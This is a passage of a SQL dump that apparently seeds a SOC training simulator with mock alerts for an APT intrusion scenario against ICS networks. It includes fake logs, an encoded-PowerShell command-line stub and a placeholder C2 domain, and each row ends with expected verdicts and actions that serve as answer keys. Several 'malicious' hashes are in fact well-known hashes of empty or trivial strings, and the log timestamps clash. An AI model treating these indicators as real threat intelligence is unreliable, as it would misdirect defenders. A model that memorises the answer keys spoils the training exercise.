system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1074, 'Lateral Movement Attempt', 'high', 'Internal Network Logs', 'An attempted lateral movement was detected targeting additional GSM components within the network. The threat actor used compromised credentials to access multiple devices.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:00Z\",\"source_ip\":\"10.1.2.15\",\"destination_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"event\":\"Lateral Movement Attempt\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"gsmlib.dll\",\"details\":{\"auth_success\":false,\"target_system\":\"GSM Node B\",\"method\":\"SMB\",\"credentials_used\":\"j.doe\"}}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash observed in suspicious activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"gsmlib.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with lateral movement attempts in GSM 
networks.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Records\",\"verdict\":\"clean\",\"details\":\"Valid user account, possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1075, 'Data Exfiltration Alert', 'high', 'Data Loss Prevention (DLP) Systems', 'Sensitive data has been exfiltrated by malware to a known command and control server. The event marks the completion of the espionage mission.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:23:06Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.12.45.67\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"filename\":\"classified_docs.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"malware_name\":\"APT29DataStealer\",\"c2_domain\":\"malicious-c2.example.com\"}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Unusual data transfer activity detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Match with known malicious hash associated with data exfiltration tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.780Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:06Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"jdoe\\\",\\\"malware_name\\\":\\\"APT29DataStealer\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1076, 'Suspicious Email Phishing Attempt', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected, mimicking communication from a known partner, attempting to lure an employee into opening a malicious attachment with the objective to gain access to ICS vendor networks.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"email_id\":\"e1d9b2c4-123f-4a2d-bc77-9e0f5e2d0b9a\",\"sender\":\"it-support@partner-company.com\",\"recipient\":\"j.doe@company.com\",\"subject\":\"Urgent: Security Update Required\",\"attachment\":\"Security_Update_10_12.zip\",\"attachment_hash\":\"3d2e479b7e1a2f7c3f5a9f7a2d6b3c4e\",\"sender_ip\":\"203.0.113.45\",\"internal_recipient_ip\":\"192.168.1.25\",\"malware_family\":\"APT29\",\"detection\":{\"method\":\"signature-based\",\"description\":\"Known phishing campaign associated with APT29 targeting ICS vendors.\"}}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-support@partner-company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d2e479b7e1a2f7c3f5a9f7a2d6b3c4e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29-related malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with phishing activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Phishing Attempt\",\"date\":\"2026-02-01T20:32:22.782Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1077, 'Execution of Reconnaissance Malware', 'high', 'Endpoint Detection and Response (EDR)', 'Once inside the network, the attackers executed a custom-built malware designed to stealthily map the industrial control systems and gather configuration details.', 'Execution', 'T1049 - System Network Connections Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:15Z\",\"event_id\":\"EXE2345\",\"host\":\"ICS-Server01\",\"user\":\"ics_admin\",\"process_name\":\"recon_malware.exe\",\"process_id\":4521,\"file_hash\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"destination_port\":445,\"protocol\":\"TCP\",\"action\":\"Executed\",\"malware_signature\":\"CustomReconTool\",\"file_path\":\"C:\\\\ProgramData\\\\recon_malware.exe\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple reconnaissance campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a critical ICS server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash matches known custom reconnaissance malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"recon_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Detection\",\"verdict\":\"malicious\",\"details\":\"File executed on host, known for network 
mapping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1078, 'Establish Persistence Through Backdoor Installation', 'high', 'System Logs', 'An advanced persistent threat was detected installing a backdoor on critical systems, enabling silent control over compromised systems for prolonged durations.', 'Persistence', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin_user\",\"process_name\":\"backdoor_installer.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Backdoor installation\",\"description\":\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File recognized as part of a known backdoor toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Admin user account used in unauthorized 
context.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 192.168.1.10.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.784Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:07Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor_installer.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Process backdoor_installer.exe executed with root privileges, originating from IP 203.0.113.45, targeting system 
192.168.1.10.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1079, 'Lateral Movement via Exploited ICS Protocols', 'high', 'Network Traffic Analysis', 'An advanced threat actor is exploiting known vulnerabilities in ICS communication protocols to move laterally within the network. The attacker aims to control interconnected systems and expand their reach.', 'Lateral Movement', 'T0889', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"Modbus\",\"action\":\"Exploit Attempt\",\"username\":\"ics_operator\",\"filename\":\"exploit_modbus.exe\",\"file_hash\":\"3d2e479f0e3f4a21a1c8c3b4b5a6e7e9\",\"event_id\":\"evt-48923\",\"message\":\"Detected lateral movement attempt using Modbus protocol exploit from source IP 203.0.113.45 targeting 192.168.1.15\",\"severity\":\"critical\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"ICS component within the network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit_modbus.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File used in lateral movement exploits\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e479f0e3f4a21a1c8c3b4b5a6e7e9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware exploiting ICS protocols\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1080, 'Data Exfiltration via Encrypted Channels', 'critical', 'Data Loss Prevention (DLP)', 'In the final stage of their operation, attackers exfiltrate valuable ICS configuration and operational data using encrypted channels. The data is intended for future intelligence and potential sabotage.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:23:35Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"encrypted\":true,\"file_hash\":\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\",\"filename\":\"ICS_config_data.zip\",\"user\":\"jdoe\",\"external_ip\":\"203.0.113.45\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"vendor\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with exfiltrated sensitive ICS data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ICS_config_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive ICS data exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of compromised account used in data 
